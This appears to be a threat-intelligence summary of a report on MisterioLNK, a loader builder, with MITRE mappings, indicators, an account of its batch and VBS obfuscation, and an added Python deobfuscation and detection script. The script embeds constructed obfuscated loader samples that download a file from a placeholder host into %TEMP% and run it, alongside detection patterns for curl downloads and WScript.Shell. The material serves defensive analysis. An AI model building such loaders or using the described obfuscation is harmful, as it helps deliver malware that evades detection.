MisterioLNK: The Open-Source Framework for Malicious Loaders

CRIL discovered MisterioLNK, an open-source .NET-based loader builder that generates obfuscated HTA, BAT, CMD, VBS, and LNK loaders which download and execute payloads with low detection rates. Threat actors have used it to deploy families like Remcos, DC RAT, and BlankStealer. #MisterioLNK #Remcos #DCRAT #BlankStealer

Keypoints

  • MisterioLNK is a .NET-based open-source loader builder available on GitHub that accepts a URL and generates loader files (BAT, CMD, HTA, VBS, LNK) to fetch and run a second-stage payload.
  • The builder includes an obfuscator module for BAT, CMD, and VBS that conceals script content (random %…% insertion for batch and Chr() concatenation for VBS) and can set custom icons for LNK files.
  • BAT/CMD loaders use curl to download the payload into a temporary directory and then execute it (example: curl -o into %TEMP% followed by start /b on the dropped executable); curl ships with current Windows builds, so the loader needs no additional tooling on the victim.
  • HTA loaders rely on JavaScript and ActiveX objects to perform downloads and execution; HTA obfuscation support is planned but currently inactive.
  • LNK loaders create shortcut targets that invoke cmd.exe to run download-and-execute commands and can masquerade with altered icons to increase user interaction.
  • Generated samples showed low detection rates across vendors for several formats (notably BAT, CMD, HTA, and some VBS variants). HTA loaders scored low even though HTA obfuscation is not yet active, so the loader templates themselves, not only the obfuscation, evade static signatures.
  • Recommendations include detection of obfuscation patterns, behavioral monitoring of scripting engines and curl-based downloads, application whitelisting, and user education about deceptive shortcut files.

MITRE Techniques

  • [T1204.002] User Execution: Malicious File – Loader files (BAT, CMD, HTA, VBS, LNK) rely on user interaction to run the payload (‘MisterioLNK utilizes multiple script formats (BAT, CMD, HTA, VBS, LNK) that rely on user interaction to execute the payload.’)
  • [T1059] Command and Scripting Interpreter – Uses scripting languages to execute commands on the target system (‘Uses scripting languages like BAT, CMD, and VBS to execute commands on the target system.’)
  • [T1059.005] Command and Scripting Interpreter: Visual Basic – Deploys obfuscated VBScript that reconstructs and executes payload-fetching commands (‘Deploys obfuscated VBScript files that execute commands to download and run additional payloads.’)
  • [T1059.003] Command and Scripting Interpreter: Windows Command Shell – Relies on cmd.exe to issue curl-based download and execution commands (‘Relies on the Windows command line (cmd.exe) to issue commands for file downloads and execution.’)
  • [T1036.008] Masquerading: Masquerade File Type – Uses LNK files with custom icons to disguise loaders as legitimate files (‘Uses LNK files with altered icons to disguise the loader as a legitimate file.’)
  • [T1027.010] Obfuscated Files or Information: Command Obfuscation – Employs multiple obfuscation methods (random %…% insertion, Chr() concatenation) to hide script content (‘MisterioLNK employs obfuscation techniques to hide the content of its scripts.’)
  • [T1071.001] Application Layer Protocol: Web Protocols – Uses HTTP/S via curl to communicate with remote servers and download payloads (‘Uses HTTP/S through the curl command to communicate with remote servers to download payloads.’)

Indicators of Compromise

  • [SHA256] Payload hashes observed in analysis – 3bcde12b9388e30df1dee8925999e6101718fde3040d2708adbbc93b400e4a17, dba195e6ccc386f9d260f09e2c5d84c1a5f8b28c707e1a353f72dba9ffa2b850, and 5 more hashes
  • [URL/Domain] Hosting and repo examples – https://github.com/K3rnel-Dev/MisterioLNK/tree/main (project repo), hxxps://live.sysinternals.com/du.exe (example download host used in LNK target)
  • [File name] Downloaded/executed artifacts – du.exe, %temp%\ntvy4adp.exe (example target filename written by curl -o and started with start /b)
  • [File types] Generated loader file examples – .lnk (shortcut loader), .vbs (VBScript loader), .bat/.cmd (batch/command loaders)

MisterioLNK is a .NET tool composed of two modules: a builder that takes a URL to a hosted second-stage payload and generates loader files (BAT, CMD, HTA, VBS, LNK), and an obfuscator that transforms BAT, CMD, and VBS loaders to evade static detections. The builder can add custom icons to LNK files, and the generated loaders save the downloaded payload into a temporary directory before launching it; the example LNK target command invokes cmd.exe to run curl against a remote URL (shown as hxxps://live.sysinternals.com/du.exe), write the result to %TEMP%, and start it.

For BAT/CMD loaders, the generated scripts call curl to fetch the payload and then execute it; when obfuscation is enabled, the batch obfuscator inserts random strings wrapped in percent signs between the characters of each command and prepends a comment line indicating MisterioLNK processing. In a batch file cmd.exe expands a reference to an undefined variable such as %xq7z% to an empty string, so the junk vanishes at run time and the command executes unchanged while static signatures on strings like "curl" or "start /b" no longer match. HTA loaders embed JavaScript and ActiveX calls to perform the same download-and-execute flow (HTA obfuscation is not yet active). VBS obfuscation converts each character of the script to its ASCII code, concatenates the resulting Chr() calls with &, and wraps the expression in Execute(), so the original script exists only in memory once reconstructed at run time.

The practical execution chain typically involves a user-triggered loader (user execution), invocation of cmd.exe or the script host to run the obfuscated script, curl-based HTTP/S retrieval of the payload, placement in a temporary folder, and process start. These steps—combined with custom LNK icons and multiple obfuscation approaches—explain the low detection rates observed for many generated samples and highlight why detection strategies should focus on behavioral indicators (scripting engine activity, unexpected curl usage, and writes/executions from %TEMP%).
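To make the two obfuscation schemes and the behavioral detection advice above concrete, here is an added triage script that reverses both transformations and then hunts for the download-and-execute chain in the recovered text. It is example code written for this page, not code from MisterioLNK or from the Cyble write-up. The two loader samples embedded in it are constructed to mimic the described obfuscation (the marker-comment wording, the junk token names, the file name stage2.exe and the placeholder URL files.example.invalid are all assumptions, not real artifacts), and the allow-list of environment variables that are kept rather than stripped is a design choice of this example.

```python
"""Deobfuscate and triage MisterioLNK-style BAT/CMD and VBS loaders.

Added example for this page; not the builder's own code.  The samples
below are constructed to imitate the obfuscation described in the text.
"""
import re
from typing import Dict, List

# Variables a real loader may legitimately reference.  Any other %name% token in
# a batch line is treated as inserted junk (cmd.exe expands it to nothing).
KNOWN_ENV = {"TEMP", "TMP", "APPDATA", "LOCALAPPDATA", "USERPROFILE",
             "PROGRAMDATA", "SYSTEMROOT", "WINDIR", "PUBLIC", "COMSPEC"}

ENV_TOKEN = re.compile(r"%([A-Za-z0-9_]+)%")
CHR_TOKEN = re.compile(r"Chr\(\s*(\d{1,3})\s*\)", re.IGNORECASE)

# Behavioral indicators of the download-and-execute chain, checked on the
# deobfuscated text rather than on the raw file.
RULES = [
    ("curl_download", re.compile(r"\bcurl\b[^\n&|]*\s(-o|--output|-O)\b", re.I)),
    ("http_url", re.compile(r"https?://[^\s\"'&]+", re.I)),
    ("temp_drop", re.compile(r"%(TEMP|TMP)%\\[^\s\"']+\.exe", re.I)),
    ("start_background", re.compile(r"\bstart\s+/b\b", re.I)),
    ("wscript_shell", re.compile(r"WScript\.Shell|Shell\.Application", re.I)),
    ("activex_download", re.compile(r"MSXML2\.(Server)?XMLHTTP|ADODB\.Stream", re.I)),
]

# Constructed batch sample: "@echo off" and a curl/start line, each split by
# random %junk% tokens the way the page describes.  Marker text is hypothetical.
SAMPLE_BAT = (
    ":: processed by MisterioLNK (hypothetical marker text)\n"
    "@e%wq%c%Zk%ho o%r4%ff\n"
    "c%aX7q%u%Zk%rl -o %TEMP%\\stage2.exe https://files.example.invalid/du.exe"
    " && st%q1%ar%zz%t /b %TEMP%\\stage2.exe\n"
)

# Constructed VBS sample: the plain script is turned into Chr()&Chr()... inside
# Execute(), mirroring the VBS obfuscator described on the page.
PLAIN_VBS = (
    'CreateObject("WScript.Shell").Run "cmd /c curl -o %TEMP%\\stage2.exe '
    'https://files.example.invalid/du.exe && start /b %TEMP%\\stage2.exe", 0, False'
)
SAMPLE_VBS = "Execute(" + "&".join(f"Chr({ord(c)})" for c in PLAIN_VBS) + ")"


def deobfuscate_batch(script: str) -> str:
    """Drop %name% tokens that are not known variables; keep the real ones."""
    def keep_or_drop(m: re.Match) -> str:
        return m.group(0) if m.group(1).upper() in KNOWN_ENV else ""
    return "\n".join(ENV_TOKEN.sub(keep_or_drop, ln) for ln in script.splitlines())


def deobfuscate_vbs(script: str) -> str:
    """Rebuild the script hidden in a Chr(n)&Chr(m)... chain; pass through otherwise."""
    codes: List[str] = CHR_TOKEN.findall(script)
    return "".join(chr(int(n)) for n in codes) if codes else script


def analyze(script: str, kind: str) -> Dict[str, object]:
    """Deobfuscate by file type, then classify on the recovered text."""
    kind = kind.lower().lstrip(".")
    if kind in ("bat", "cmd"):
        decoded = deobfuscate_batch(script)
        # junk tokens removed = tokens before minus tokens kept
        obf = len(ENV_TOKEN.findall(script)) - len(ENV_TOKEN.findall(decoded))
    elif kind == "vbs":
        decoded = deobfuscate_vbs(script)
        obf = len(CHR_TOKEN.findall(script))   # size of the Chr() chain
    else:
        raise ValueError(f"unsupported loader type: {kind}")

    hits = sorted(name for name, rx in RULES if rx.search(decoded))
    downloads = {"curl_download", "activex_download"} & set(hits)
    executes = {"start_background", "wscript_shell"} & set(hits)
    if downloads and executes and "http_url" in hits:
        verdict = "download-and-execute loader"
    elif hits:
        verdict = "suspicious"
    else:
        verdict = "clean"
    return {"kind": kind, "decoded": decoded, "obfuscation_tokens": obf,
            "hits": hits, "verdict": verdict}


if __name__ == "__main__":
    for sample, kind in ((SAMPLE_BAT, "bat"), (SAMPLE_VBS, "vbs")):
        r = analyze(sample, kind)
        print(f"[{kind}] {r['verdict']} (obfuscation tokens: {r['obfuscation_tokens']})")
        print("  hits:", ", ".join(r["hits"]))
        print("  decoded:", r["decoded"].strip().splitlines()[-1])
```

Running the script on the two constructed samples reports both as a download-and-execute loader: the batch sample after 7 junk tokens are stripped, the VBS sample after the Chr() chain is collapsed back to the one-line WScript.Shell command. Point it at real files only after the deobfuscation output has been reviewed, since the allow-list approach will also strip a legitimately referenced variable that is not in KNOWN_ENV, and a loader that downloads with ActiveX but executes through a route not listed in RULES will only score as suspicious.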

Read more: https://cyble.com/blog/misteriolnk-the-open-source-builder-behind-malicious-loaders/